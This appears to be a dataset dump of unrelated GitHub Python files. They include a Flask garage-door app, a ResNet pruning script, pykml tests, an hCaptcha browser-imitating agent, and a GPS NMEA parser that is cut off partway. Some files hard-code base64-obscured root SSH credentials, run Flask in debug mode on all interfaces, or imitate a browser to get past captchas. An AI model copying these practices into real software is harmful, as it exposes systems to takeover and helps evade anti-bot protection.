'H':['Hotel','How','Have'],
'I':['India','Italy','Item'],
'J':['Juliet','Jig','John'],
'K':['Kilo','Kimberly','King'],
'L':['Lima','Love','Lima'],
'M':['Mama','Mary','Mike'],
'N':['November','Nan','Nap'],
'O':['Oscar','Oboe','Opal'],
'P':['Papa','Peter','Pup'],
'Q':['Quebec','Queen','Quack'],
'R':['Romeo','Roger','Rush'],
'S':['Sierra','Sugar','Sail'],
'T':['Tango','Tare','Tape'],
'U':['Uniform','Uncle','Unit'],
'V':['Victor','Victor','Vice'],
'W':['Whiskey','William','Watch'],
'X':['Xray','X-ray','X-Ray'],
'Y':['Yankee','York','Yoke'],
'Z':['Zulu','Zebra','Zed']}
words = ['COME', 'DEAD', 'DIED', 'FOUR', 'FROM', 'FULL', 'GAVE', 'HAVE', 'HERE', 'LAST', 'LIVE', 'LONG', 'NOTE', 'POOR', 'TAKE', 'TASK', 'THAT', 'THEY', 'THIS', 'THUS', 'VAIN', 'WHAT', 'WILL', 'WORK', 'ABOVE', 'BIRTH', 'BRAVE', 'CAUSE', 'CIVIL', 'EARTH', 'EQUAL', 'FIELD', 'FINAL', 'FORTH', 'GREAT', 'LIVES', 'MIGHT', 'NEVER', 'NOBLY', 'PLACE', 'POWER', 'SCORE', 'SENSE', 'SEVEN', 'SHALL', 'THEIR', 'THESE', 'THOSE', 'UNDER', 'WHICH', 'WORLD', 'YEARS', 'BEFORE', 'ENDURE', 'FORGET', 'FOUGHT', 'GROUND', 'HALLOW', 'HIGHLY', 'LARGER', 'LITTLE', 'LIVING', 'NATION', 'PEOPLE', 'PERISH', 'PROPER', 'RATHER', 'SHOULD', 'BROUGHT', 'CREATED', 'DETRACT']
word_len = 70
word = words[randint(0,70)]
msg = ''
for c in word:
msg += translation[c][randint(0,2)] + ' '
captcha_msg = rot_encode(msg)
return captcha_msg,msg
def rank_users(users):
user_ranks = []
for i,user in enumerate(users):
if i == 0:
user_ranks.append({'users':[user],'len':1})
else:
for j,x in enumerate(user_ranks):
if user_ranks[j]['len'] == 1:
if user['points'] == x['users'][0]['points']:
user_ranks[j]['users'].append(user)
user_ranks[j]['len'] +=1
break
else:
print(user,x['users'][j])
if user['points'] == x['users'][j]['points']:
user_ranks[j]['len'] +=1
user_ranks[j]['users'].append(user)
break
else:
user_ranks.append({'len':1,'users':[user]})
return user_ranks
``` |
{
"source": "133794m3r/i_am_not_forgotten",
"score": 2
} |
#### File: i_am_not_forgotten/mongoapi/api.py
```python
from flask import Flask, request, Response
from database.db import initialize_db
from database.model import GEOIP
from hotline_database.hotline_db import hotline_initialize_db
from hotline_database.hotline_model import Hotline
app = Flask(__name__)
app.config['MONGODB_SETTINGS'] = {
'host': 'mongodb://localhost/all-geoips'
}
@app.route('/ips')
def get_ips():
ips = GEOIP.objects.to_json()
return Response(ips, mimetype="application/json", status=200)
@app.route('/ips/<specific_ip>')
def get_specific_ips(specific_ip):
c_name = GEOIP.objects.get(specific_ip__gte=GEOIP.network).first.to_json()
hotline = Hotline.objects.get(c_name=Hotline.country_name).to_json()
return Response(hotline, mimetype="application/json", status=200)
initialize_db(app)
app.run()
```
#### File: mongoapi/hotline_database/hotline_db.py
```python
from flask_mongoengine import MongoEngine
hotline_db = MongoEngine()
def hotline_initialize_db(app):
hotline_db.init_app(app)
``` |
{
"source": "1337DS/SmartGarage",
"score": 3
} |
#### File: SmartGarage/garage/flaskapp.py
```python
from utils.sim_auf import start as sim_auf
from utils.sim_zu import start as sim_zu
import sys
#import RPi.GPIO as GPIO
from flask import Flask, render_template, request
import time
import os
from datetime import datetime
import re
import pywhatkit
import keyboard as k
import ultraschallsensor
app = Flask(__name__)
# Setzen der GPIO Ein-/Ausgaenge
#GPIO.setmode(GPIO.BCM)
#GPIO.setwarnings(False)
#GPIO.setup(21, GPIO.OUT)
#GPIO.setup(20, GPIO.IN)
#lf = "/home/pi/garage/logs.txt"
lf_path = r"./logs.txt"
#lf = open(lf_path, encoding="UTF-8", mode="w")
status_path =r"./status.txt"
@app.route("/")
def main():
# For each pin, read the pin state and store it in the pins dictionary:
# Put the pin dictionary into the template data dictionary:
templateData = {'test'}
# Pass the template data into the template main.html and return it to the user
return render_template('main.html', distanz=ultraschallsensor.distanz())
# Diese Funktion wird bei Klick auf den Open Button ausgefuhrt:
@app.route("/activate")
def action():
#GPIO.output(21, GPIO.HIGH)
#time.sleep(1)
#GPIO.output(21, GPIO.LOW)
print(1)
with open(status_path, "r") as sfile:
status = sfile.read()
sfile.close()
print(2)
print(f"status={status}")
if int(status) == 0:
with open(status_path, "w") as f:
f.write("1")
print("write1")
sim_auf()
elif int(status) == 1:
with open(status_path, "w") as sfile:
sfile.write("0")
print("write0")
sim_zu()
now = datetime.now()
time = now.strftime("%d Jan %H:%M:%S")
#pywhatkit.sendwhatmsg_instantly("+49 178 8899478", f'Garage geöffnet durch Weboberfläche {time}',25, True, 5)
#pywhatkit.sendwhatmsg_to_group_instantly("L2wDsVunQhe4Zl5DkOTv90", f'Garage geöffnet durch Weboberfläche {time}', 15, True, 5)
with open(lf_path, "a") as file:
file.writelines(f"{time} -> WebApp\n")
file.close()
# Eintrag ins Logfile
#log_file = open(lf, "a")
#read logfile
# @ Luca debugging necessary here
#ts = datetime.strptime(re.findall(".+?(?= ->)", last_line)[0], '%d/%m/%y %H:%M:%S')
#if kennzeichen in whitelist dann �ffne
# ts = datetime.now().strftime('%d/%m/%y %H:%M:%S')
# print("Garage-door opened for Web-App")
# log_file.write("{ts}; Website\n")
return render_template('main.html', distanz=ultraschallsensor.distanz())
@app.route('/logs')
def info():
with open(lf_path) as file:
logdata = file.readlines()
return render_template('logs.html',logdata=logdata, distanz=ultraschallsensor.distanz())
if __name__ == "__main__":
app.run(host='0.0.0.0', port=80, debug=True)
```
#### File: garage/utils/sim_zu.py
```python
import paramiko
def start():
host = "192.168.0.113"
port = 22
username = "pi"
password = "<PASSWORD>"
command = 'export DISPLAY=:0 ; vlc "/home/pi/garage/garage_zu.mp4" --quiet --fullscreen'
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(host, port, username, password)
print("start1")
stdin, stdout, stderr = ssh.exec_command(command)
print("start2")
stdout.channel.set_combine_stderr(True)
print("start3")
#output = stdout.readlines()
print("start4")
if __name__ == "__main__":
start()
``` |
{
"source": "1337Eddy/BirdRecognitionPruning",
"score": 2
} |
#### File: imagenet/l1-norm-pruning/prune.py
```python
import argparse
import numpy as np
import os
import time
import torch
import torch.nn as nn
import torch.backends.cudnn as cudnn
from torch.autograd import Variable
from torchvision import datasets, transforms
from torchsummary import summary
from resnet import resnet34
# Prune settings
parser = argparse.ArgumentParser(description='Pruning filters for efficient ConvNets')
parser.add_argument('--data', type=str, default='/media/eddy/backup/datasets/imagenet/ILSVRC/Data/CLS-LOC',
help='Path to imagenet validation data')
parser.add_argument('--test-batch-size', type=int, default=64, metavar='N',
help='input batch size for testing (default: 64)')
parser.add_argument('--no-cuda', action='store_true', default=False,
help='disables CUDA training')
parser.add_argument('--print-freq', '-p', default=10, type=int,
metavar='N', help='print frequency (default: 10)')
parser.add_argument('--save', default='.', type=str, metavar='PATH',
help='path to save prune model (default: none)')
parser.add_argument('-j', '--workers', default=16, type=int, metavar='N',
help='number of data loading workers (default: 16)')
parser.add_argument('-v', default='A', type=str,
help='version of the pruned model')
parser.add_argument('-t', '--test-epochs', default=100, type=int, metavar='T',
help='numbers of test epochs for evaluation')
args = parser.parse_args()
args.cuda = not args.no_cuda and torch.cuda.is_available()
if not os.path.exists(args.save):
os.makedirs(args.save)
model = resnet34(pretrained=True)
model = torch.nn.DataParallel(model).cuda()
cudnn.benchmark = True
print('Pre-processing Successful!')
def accuracy(output, target, topk=(1,)):
"""Computes the precision@k for the specified values of k"""
maxk = max(topk)
batch_size = target.size(0)
_, pred = output.topk(maxk, 1, True, True)
pred = pred.t()
correct = pred.eq(target.view(1, -1).expand_as(pred))
res = []
for k in topk:
correct_k = correct[:k].reshape(-1).float().sum(0, keepdim=True)
res.append(correct_k.mul_(100.0 / batch_size))
return res
# simple test model after Pre-processing prune (simple set BN scales to zeros)
def test(model):
kwargs = {'num_workers': 1, 'pin_memory': True} if args.cuda else {}
normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
val_loader = torch.utils.data.DataLoader(
datasets.ImageFolder(os.path.join(args.data,'val'), transforms.Compose([
transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
normalize,
])),
batch_size=args.test_batch_size, shuffle=False,
num_workers=args.workers, pin_memory=True)
model.eval()
batch_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
top5 = AverageMeter()
criterion = nn.CrossEntropyLoss().cuda()
end = time.time()
for i, (input, target) in enumerate(val_loader):
target = target.cuda(non_blocking=True)
input_var = torch.autograd.Variable(input, volatile=True)
target_var = torch.autograd.Variable(target, volatile=True)
# compute output
output = model(input_var)
loss = criterion(output, target_var)
# measure accuracy and record loss
prec1, prec5 = accuracy(output.data, target, topk=(1, 5))
losses.update(loss.item(), input.size(0))
top1.update(prec1[0], input.size(0))
top5.update(prec5[0], input.size(0))
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if i % args.print_freq == 0:
print('Test: [{0}/{1}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Prec@1 {top1.val:.3f} ({top1.avg:.3f})\t'
'Prec@5 {top5.val:.3f} ({top5.avg:.3f})'.format(
i, args.test_epochs, batch_time=batch_time, loss=losses,
top1=top1, top5=top5))
if i == args.test_epochs:
break
print(' * Prec@1 {top1.avg:.3f} Prec@5 {top5.avg:.3f}'
.format(top1=top1, top5=top5))
return top1.avg, top5.avg
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
skip = {
'A': [2, 8, 14, 16, 26, 28, 30, 32],
'B': [2, 8, 14, 16, 26, 28, 30, 32],
}
#pruning ratios for layer stages
prune_prob = {
'A': [0.5, 0.7, 0.6, 0.5],
'B': [0.5, 0.6, 0.4, 0.0],
}
layer_id = 1
cfg = []
cfg_mask = []
"""
iterate over layers and create new network structure based on L1 norm pruning
layers with 1x1 conv kernels are ignored
"""
for m in model.modules():
if isinstance(m, nn.Conv2d):
if m.kernel_size == (1,1):
continue
out_channels = m.weight.data.shape[0]
if layer_id in skip[args.v]:
cfg_mask.append(torch.ones(out_channels))
cfg.append(out_channels)
layer_id += 1
continue
if layer_id % 2 == 0:
#define layer stage for pruning ratio
if layer_id <= 6:
stage = 0
elif layer_id <= 14:
stage = 1
elif layer_id <= 26:
stage = 2
else:
stage = 3
prune_prob_stage = prune_prob[args.v][stage]
weight_copy = m.weight.data.abs().clone().cpu().numpy()
#sum weights of 3d filter
L1_norm = np.sum(weight_copy, axis=(1,2,3))
num_keep = int(out_channels * (1 - prune_prob[args.v][stage]))
arg_max = np.argsort(L1_norm)
arg_max_rev = arg_max[::-1][:num_keep]
mask = torch.zeros(out_channels)
mask[arg_max_rev.tolist()] = 1
cfg_mask.append(mask)
cfg.append(num_keep)
layer_id += 1
continue
layer_id += 1
assert len(cfg) == 16, "Length of cfg variable is not correct."
newmodel = resnet34(cfg=cfg)
newmodel = torch.nn.DataParallel(newmodel).cuda()
start_mask = torch.ones(3)
layer_id_in_cfg = 0
conv_count = 1
"""
the remaining parameters of the original model
are transferred to the pruned new model
"""
for [m0, m1] in zip(model.modules(), newmodel.modules()):
if isinstance(m0, nn.Conv2d):
if m0.kernel_size == (1,1):
# Cases for down-sampling convolution.
m1.weight.data = m0.weight.data.clone()
continue
if conv_count == 1:
m1.weight.data = m0.weight.data.clone()
conv_count += 1
continue
if conv_count % 2 == 0:
mask = cfg_mask[layer_id_in_cfg]
idx = np.squeeze(np.argwhere(np.asarray(mask.cpu().numpy())))
if idx.size == 1:
idx = np.resize(idx, (1,))
w = m0.weight.data[idx.tolist(), :, :, :].clone()
#print(w)
m1.weight.data = w.clone()
layer_id_in_cfg += 1
conv_count += 1
continue
if conv_count % 2 == 1:
mask = cfg_mask[layer_id_in_cfg-1]
idx = np.squeeze(np.argwhere(np.asarray(mask.cpu().numpy())))
if idx.size == 1:
idx = np.resize(idx, (1,))
w = m0.weight.data[:, idx.tolist(), :, :].clone()
m1.weight.data = w.clone()
conv_count += 1
continue
elif isinstance(m0, nn.BatchNorm2d):
assert isinstance(m1, nn.BatchNorm2d), "There should not be bn layer here."
if conv_count % 2 == 1:
mask = cfg_mask[layer_id_in_cfg-1]
idx = np.squeeze(np.argwhere(np.asarray(mask.cpu().numpy())))
if idx.size == 1:
idx = np.resize(idx, (1,))
m1.weight.data = m0.weight.data[idx.tolist()].clone()
m1.bias.data = m0.bias.data[idx.tolist()].clone()
m1.running_mean = m0.running_mean[idx.tolist()].clone()
m1.running_var = m0.running_var[idx.tolist()].clone()
continue
m1.weight.data = m0.weight.data.clone()
m1.bias.data = m0.bias.data.clone()
m1.running_mean = m0.running_mean.clone()
m1.running_var = m0.running_var.clone()
elif isinstance(m0, nn.Linear):
m1.weight.data = m0.weight.data.clone()
m1.bias.data = m0.bias.data.clone()
torch.save({'cfg': cfg, 'state_dict': newmodel.state_dict()}, os.path.join(args.save, 'pruned.pth.tar'))
summary(newmodel, (3, 224, 224))
#acc_top1, acc_top5 = test(model)
new_acc_top1, new_acc_top5 = test(newmodel)
num_parameters1 = sum([param.nelement() for param in model.parameters()])
num_parameters2 = sum([param.nelement() for param in newmodel.parameters()])
with open(os.path.join(args.save, "prune.txt"), "w") as fp:
fp.write("Before pruning: "+"\n")
fp.write("acc@1: tensor(73.3140, device='cuda:0')\n")
fp.write("acc@5: tensor(91.4200, device='cuda:0')\n")
fp.write("Number of parameters:\n")
fp.write("21797672\n")
fp.write("==========================================\n")
fp.write("After pruning: "+"\n")
fp.write("cfg :"+"\n")
fp.write(str(cfg)+"\n")
fp.write("acc@1: "+str(new_acc_top1)+"\n"+"acc@5: "+str(new_acc_top5)+"\n")
fp.write("Number of parameters: \n"+str(num_parameters2)+"\n")
``` |
{
"source": "1337-Haxx0r/Test",
"score": 4
} |
#### File: 1337-Haxx0r/Test/insecure_password_generator.py
```python
from random import randint
from sys import argv
from re import match
from sys import exit
if len(argv) != 1:
password_length = argv[1]
if not match("^([1-9]|[1-9][0-9])$", password_length):
print("Password length is invalid!")
exit()
else:
# Default Password Length
password_length = 16
alphanumeric = "A B C D E F G H I J K L M N O P Q R S T U V W X Y Z a b c d e f g h i j k l m n o p q r s t u v w x y z 0 1 2 3 4 5 6 7 8 9"
alphanumeric = alphanumeric.split(" ")
def get_random_char():
return alphanumeric[randint(0, len(alphanumeric) - 1)]
random_chars = []
password_length = int(password_length)
for i in range(password_length):
random_chars.append(get_random_char())
insecure_password = "".join(random_chars)
print(insecure_password)
if password_length < 16:
print("Your password is dangerously short.")
``` |
{
"source": "1337Lurker/2019-advent-of-code",
"score": 4
} |
#### File: 2019-advent-of-code/day1/day1.py
```python
import fileinput
import math
def main():
fuel_required = 0
for mass in fileinput.input():
fuel_required += calculate_fuel_for(mass)
print(fuel_required)
def calculate_fuel_for(mass):
fuel_required = math.floor(int(mass) / 3) - 2
if fuel_required > 0:
return fuel_required + calculate_fuel_for(fuel_required)
else:
return 0
if __name__ == "__main__":
# execute only if run as a script
main()
``` |
{
"source": "1337/pykml",
"score": 3
} |
#### File: pykml/test/test_parser.py
```python
from __future__ import print_function
import unittest
from os import path
import urllib2
from StringIO import StringIO
from lxml import etree
from pykml.parser import Schema
from pykml.parser import fromstring
from pykml.parser import parse
class ValidatorTestCase(unittest.TestCase):
def test_initialize_schema(self):
"""Tests the creation Schema instance"""
schema = Schema("ogckml22.xsd")
self.assertTrue(isinstance(schema.schema, etree.XMLSchema))
def test_initialize_schema_remote_url(self):
schema = Schema("http://code.google.com/apis/kml/schema/kml22gx.xsd")
self.assertTrue(isinstance(schema.schema, etree.XMLSchema))
class ParseKmlOgcTestCase(unittest.TestCase):
"A collection of tests related to parsing KML OGC documents"
def test_fromstring_kml_document(self):
"Tests the parsing of an valid KML string"
test_kml = '<kml xmlns="http://www.opengis.net/kml/2.2"/>'
tree = fromstring(test_kml, schema=Schema("ogckml22.xsd"))
self.assertEquals(etree.tostring(tree), test_kml)
tree = fromstring(test_kml)
self.assertEquals(etree.tostring(tree), test_kml)
def test_fromstring_invalid_kml_document(self):
"Tests the parsing of an invalid KML string"
test_kml = '<bad_element />'
try:
tree = fromstring(test_kml, schema=Schema("ogckml22.xsd"))
self.assertTrue(False)
except etree.XMLSyntaxError:
self.assertTrue(True)
except:
self.assertTrue(False)
def test_parse_kml_document(self):
"Tests the parsing of an valid KML file object"
test_kml = '<kml xmlns="http://www.opengis.net/kml/2.2"/>'
fileobject = StringIO(test_kml)
schema = Schema("ogckml22.xsd")
tree = parse(fileobject, schema=schema)
self.assertEquals(etree.tostring(tree), test_kml)
tree = parse(fileobject, schema=schema)
self.assertEquals(etree.tostring(tree), test_kml)
def test_parse_invalid_kml_document(self):
"Tests the parsing of an invalid KML document"
fileobject = StringIO('<bad_element />')
try:
tree = parse(fileobject, schema=Schema("ogckml22.xsd"))
self.assertTrue(False)
except etree.XMLSyntaxError:
self.assertTrue(True)
except:
self.assertTrue(False)
def test_parse_kml_url(self):
"Tests the parsing of a KML URL"
url = 'http://code.google.com/apis/kml/documentation/KML_Samples.kml'
#url = 'http://kml-samples.googlecode.com/svn/trunk/kml/Document/doc-with-id.kml'
#url = 'http://code.google.com/apis/kml/documentation/kmlfiles/altitudemode_reference.kml'
#url = 'http://code.google.com/apis/kml/documentation/kmlfiles/animatedupdate_example.kml'
try:
fileobject = urllib2.urlopen(url)
tree = parse(fileobject, schema=Schema("ogckml22.xsd"))
self.assertEquals(
etree.tostring(tree)[:78],
'<kml xmlns="http://www.opengis.net/kml/2.2">'
'<Document>'
'<name>KML Samples</name>'
)
except urllib2.URLError:
print('Unable to access the URL. Skipping test...')
def test_parse_kml_file_with_cdata(self):
"Tests the parsing of a local KML file, with a CDATA description string"
test_datafile = path.join(
path.dirname(__file__),
'testfiles',
'google_kml_tutorial/using_the_cdata_element.kml'
)
# parse with validation
with open(test_datafile) as f:
doc = parse(f, schema=Schema('ogckml22.xsd'))
self.assertEquals(
etree.tostring(doc),
'<kml xmlns="http://www.opengis.net/kml/2.2">'
'<Document>'
'<Placemark>'
'<name>CDATA example</name>'
'<description>'
'<![CDATA[\n'
' <h1>CDATA Tags are useful!</h1>\n'
' <p><font color="red">Text is <i>more readable</i> and \n'
' <b>easier to write</b> when you can avoid using entity \n'
' references.</font></p>\n'
' ]]>'
'</description>'
'<Point>'
'<coordinates>102.595626,14.996729</coordinates>'
'</Point>'
'</Placemark>'
'</Document>'
'</kml>'
)
# parse without validation
with open(test_datafile) as f:
doc2 = parse(f)
self.assertEquals(
etree.tostring(doc2),
'<kml xmlns="http://www.opengis.net/kml/2.2">'
'<Document>'
'<Placemark>'
'<name>CDATA example</name>'
'<description>'
'<![CDATA[\n'
' <h1>CDATA Tags are useful!</h1>\n'
' <p><font color="red">Text is <i>more readable</i> and \n'
' <b>easier to write</b> when you can avoid using entity \n'
' references.</font></p>\n'
' ]]>'
'</description>'
'<Point>'
'<coordinates>102.595626,14.996729</coordinates>'
'</Point>'
'</Placemark>'
'</Document>'
'</kml>'
)
def test_parse_invalid_ogc_kml_document(self):
"""Tests the parsing of an invalid KML document. Note that this KML
document uses elements that are not in the OGC KML spec.
"""
url = 'http://code.google.com/apis/kml/documentation/kmlfiles/altitudemode_reference.kml'
try:
fileobject = urllib2.urlopen(url)
tree = parse(fileobject, schema=Schema("ogckml22.xsd"))
self.assertTrue(False)
except urllib2.URLError:
print('Unable to access the URL. Skipping test...')
except etree.XMLSyntaxError:
self.assertTrue(True)
except:
self.assertTrue(False)
class ParseKmlGxTestCase(unittest.TestCase):
"A collection of tests related to parsing KML Google Extension documents"
def test_parse_kml_url(self):
"Tests the parsing of a KML URL"
url = 'http://code.google.com/apis/kml/documentation/kmlfiles/altitudemode_reference.kml'
try:
fileobject = urllib2.urlopen(url)
tree = parse(fileobject, schema=Schema('kml22gx.xsd'))
self.assertEquals(
etree.tostring(tree)[:185],
'<kml xmlns="http://www.opengis.net/kml/2.2" '
'xmlns:gx="http://www.google.com/kml/ext/2.2">'
'<!-- required when using gx-prefixed elements -->'
'<Placemark>'
'<name>gx:altitudeMode Example</name>'
)
except urllib2.URLError:
print('Unable to access the URL. Skipping test...')
def test_parse_kml_file(self):
"Tests the parsing of a local KML file, with validation"
test_datafile = path.join(
path.dirname(__file__),
'testfiles',
'google_kml_developers_guide/complete_tour_example.kml'
)
# parse without validation
with open(test_datafile) as f:
doc = parse(f)
# parse with validation (local schema file)
with open(test_datafile) as f:
doc = parse(f, schema=Schema('kml22gx.xsd'))
# parse with validation (remote schema file)
with open(test_datafile) as f:
doc = parse(f, schema=Schema('http://code.google.com/apis/kml/schema/kml22gx.xsd'))
self.assertTrue(True)
def test_parse_kml_url_2(self):
"Tests the parsing of a KML URL"
url = 'http://code.google.com/apis/kml/documentation/kmlfiles/animatedupdate_example.kml'
try:
fileobject = urllib2.urlopen(url)
tree = parse(fileobject, schema=Schema('kml22gx.xsd'))
self.assertEquals(
etree.tostring(tree)[:137],
'<kml xmlns="http://www.opengis.net/kml/2.2" '
'xmlns:gx="http://www.google.com/kml/ext/2.2">'
'<Document>'
'<name>gx:AnimatedUpdate example</name>'
)
except urllib2.URLError:
print('Unable to access the URL. Skipping test...')
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "1337Syntax/py-hcaptcha",
"score": 3
} |
#### File: hcaptcha/agents/base.py
```python
from typing import Literal
from urllib.parse import urlencode
import json
import time
class Agent:
def __init__(self):
self._epoch_offset = 0
def get_screen_properties(self) -> dict:
"""Returns dict representing `window.screen`."""
return {}
def get_navigator_properties(self) -> dict:
"""Returns dict representing `window.navigator`."""
return {}
def epoch(self, ms: bool = True):
"""Returns current timestamp, with offset added."""
t = time.time() * 1000
t += self._epoch_offset
if not ms: t /= 1000
return int(t)
def epoch_travel(self, delta: float, ms: bool = True):
"""Offsets the epoch returned by `Agent.epoch`."""
if not ms: delta *= 1000
self._epoch_offset += delta
def epoch_wait(self):
"""Resets the epoch offset."""
if self._epoch_offset > 0:
time.sleep(self._epoch_offset/1000)
self._epoch_offset = 0
def json_encode(self, data: Literal) -> str:
"""Simulates a browser's way of JSON encoding."""
return json.dumps(data, separators=(",", ":"))
def url_encode(self, data: dict) -> str:
"""Simulates a browser's way of URL encoding."""
return urlencode(data)
def format_headers(
self,
url: str,
body: bytes = None,
headers: dict = {},
origin_url: str = None,
sec_site: str = "cross-site",
sec_mode: str = "cors",
sec_dest: str = "empty"
) -> dict:
"""Formats headers in a browser-like way."""
return headers
```
#### File: hcaptcha/proofs/__init__.py
```python
from . import hsl
from . import hsw
def get_proof(type, data):
if type == "hsl":
return hsl.get_proof(data)
elif type == "hsw":
return hsw.get_proof(data)
raise Exception(f"Unrecognized proof type '{type}'")
``` |
{
"source": "1337u53r/MotMot",
"score": 3
} |
#### File: 1337u53r/MotMot/NMEAparser.py
```python
from paramiko import SSHClient
from scp import SCPClient
import base64
import time
######################## Use this snippet for manual user input of the NMEA Sentence########################################
#nmea = input("Please enter a NMEA sentence: ") #Input the NMEA sentence here - Currently on works for 'GPRMC' sentences
#nmeaSplitSentence = nmea.split(",") #Splits the NMEA sentence into sections (type,time,status etc.)
#print (nmeaSplitSentence)
############################################################################################################################
def parser():
longlat = open("/home/pi/MotMot/longlat.txt", "w+") #creates the file in the current directory
longlat.close()
latlng = open("/home/pi/MotMot/latlng.txt", "w+") #creates the file in the current directory(ensures it exists so not to throw an error when removing duplicates)
latlng.close()
satView = "0"
with open("/home/pi/MotMot/data.txt", "r") as data: #opens the file containg the captured data
for line in data:
nmea = line #Sets the variable equal to the string in data.txt
nmeaSplitSentence = nmea.split(",") #Splits the NMEA sentence into sections (type,time,status etc.)
if "GPRMC" in nmea:
type = "GPRMC" #Assign each section of the NMEA sentence a variable
time = nmeaSplitSentence[1:2]
latitude = nmeaSplitSentence[3:4] # Latitude: DDMM.MMMM (The first two characters are the degrees.)
latitudeDir = nmeaSplitSentence[4:5]
longitude = nmeaSplitSentence[5:6] #Longitude: DDDMM.MMMM (The first three characters are the degrees.)
longitudeDir = nmeaSplitSentence[6:7]
date = nmeaSplitSentence[9:10]
type = str(type) #Makes object variables into string reprsentations
time = str(time)
latitude = str(latitude)
latitudeDir = str(latitudeDir)
longitude = str(longitude)
longitudeDir = str(longitudeDir)
date = str(date)
removeSplitter = ["'", "[", "]"] #Removes the brackets and hypen from the orginal sentence split to allow for string manipulation
for splitter in removeSplitter:
time = time.replace(splitter, '')
latitude = latitude.replace(splitter, '')
latitudeDir = latitudeDir.replace(splitter, '')
longitude = longitude.replace(splitter, '')
longitudeDir = longitudeDir.replace(splitter, '')
date = date.replace(splitter, '')
afterParse = open("/home/pi/MotMot/longlat.txt", "a+") #use this to write to a file in the same location as this program
#if the length of the NMEA sentence is 38 after the splitting (meaning it's a GPRMC sentence) then write the needed data into a txt file
if len(type + " " + latitude[0:2] + "°" + latitude[2:8] + latitudeDir + " " + longitude[0:3] + "°" + longitude[3:9] + longitudeDir + " " + time[0:2] + ":" + time[2:4] + ":" + time[4:6] + "\n") == 38:
afterParse.write(type + " " + latitude[0:2] + "°" + latitude[2:8] + latitudeDir + " " + longitude[0:3] + "°" + longitude[3:9] + longitudeDir + " " + time[0:2] + ":" + time[2:4] + ":" + time[4:6] + " " + date[0:2] + "/" + date[2:4] + "/" + date[4:6] + "\n") #write the long and lat to the file ready to be plotted
#Open another txt file. This file gets transferred to the server, holding the required coordinates and extra details we use to show stuff on the website
DMS = open("/home/pi/MotMot/latlng.txt", "a+")
#Converting the latitude (DMS) to decimal for the website to understand
if(latitude[0:2] not in ".0123456789"): #Weird way to avoid processing bad input but it works
if("[" not in latitude[0:2]):
if("\\" not in latitude[0:2]) and ("x" not in latitude[0:2]) and (";" not in latitude[0:2]):
degree = int(latitude[0:2])
if(latitude[2:] not in ".0123456789"):
if("]" not in latitude[2:]):
if("\\" not in latitude[2:]) and ("x" not in latitude[2:]) and (";" not in latitude[2:]):
min = float(latitude[2:])
#sec = float(latitude[5:8])
#Writing out the decimal latitude value to latlng.txt
if (date[4:6] == "19"):
#This was the most accurate conversion method from DMS to decimal
MiNuTs = (min/60) #+ (sec/3600)
#DMS.write(latitude + " ")
DMS.write(str(degree) + "." + str(MiNuTs)[2:8] + " ")
#If first 2 characters of longitude is 00 then it's a negative number, so convert it that way.
if(longitude[0:2] == "00"):
#Convert longitude DMS to decimal (Taking 00's into consideration)
degree = "-" + longitude[2:3]
else:
degree = longitude[0:3]
if(longitude[3:5] not in ".0123456789"):
#Ignore string inputs that might cause problems when trying to convert to float & int
if ("]" not in longitude[3:5]) and ("A^" not in longitude[3:5]):
min = float(longitude[3:5])
sec = float("0." + longitude[6:9])
min+= sec
if (date[4:6] == "19"):
DMS.write(degree + "." + str(round((min/60),4))[2:] + " " + time[0:2] + ":" + time[2:4] + ":" + time[4:6] + " " + date[0:2] + "/" + date[2:4] + "/" + date[4:6] + " " + satView + " " + "\n")
DMS.close()
#Print out debug info in terminal
print ("Type: " + type) #Displays the NMEA sentence in Human Readable form
print ("Time: ", time[0:2] + ":" + time[2:4] + ":" + time[4:6])
print ("Latitude: ", latitude[0:2] + "°" + latitude[2:9] + latitudeDir)
print ("Longitude: ", longitude[0:3] + "°" + longitude[3:10] + longitudeDir)
print ("Date: ", date[0:2] + "/" + date[2:4] + "/" + date[4:6])
afterParse.close() #Close the file after writing
#GPGSV type sentence handling (for satellite numbers)
'''elif "GPGSV" in nmea:
type = "GPGSV" #Assign each section of the NMEA sentence a variable
satView = nmeaSplitSentence[3:4]
satNum = nmeaSplitSentence[4:5]
satView = str(satView)
satNum = str(satNum)
removeSplitter = ["'", "[", "]"]
for splitter in removeSplitter:
satView = satView.replace(splitter, '')
satNum = satNum.replace(splitter, '')
afterParse = open("/home/pi/MotMot/longlat.txt", "a+") #use this to write to a file in the same location as this program
afterParse.write(type + " " + satView + " " + satNum + " " + "\n") #write the long and lat to the file ready to be plotted
afterParse.close() #Close the file after writing'''
def removeDups():
#Remove duplicate entries (needs to have "latlng.txt" already created)
dupCheck = open("/home/pi/MotMot/latlng.txt", "r").readlines() #opens the file and reads each line ready to check for duplicates
dupCheck_set = set(dupCheck) #Creates a set from the contents of the file ready to loop through('set' is used, as it creates a set using only unqiue lines)
dupremoved = open("/home/pi/MotMot/latlng.txt", "w") #opens file ready to overwrite the file
for line in dupCheck_set: #loop through and write lines from the set to file
dupremoved.write(line)
def timeSorter():
#sorts the entries into time order
timeSort = open("/home/pi/MotMot/latlng.txt", "r").readlines() #opens the file and reads each line
timeSorted = sorted(timeSort, key=lambda i: (i.split(" ")[-4]), reverse=True) #sorts the lines into order using the timestamps, change to "reverse=False" to put in ascending order
reorderSortedTime = open("/home/pi/MotMot/latlng.txt", "w") ##opens file ready to overwrite the file
for line in timeSorted: #loop through and write lines from the list to file
reorderSortedTime.write(line)
def transfer():
#Send the coordinates to the server
ssh = SSHClient()
ssh.load_host_keys('/home/pi/MotMot/known_hosts') #looks to load the SSH key if it is saved locally
ssh.connect("192.168.3.11", username=base64.b64decode("cm9vdA=="), password=base64.b64decode("<PASSWORD>=="), look_for_keys=False) #Connects to the server via SSH
with SCPClient(ssh.get_transport()) as scp:
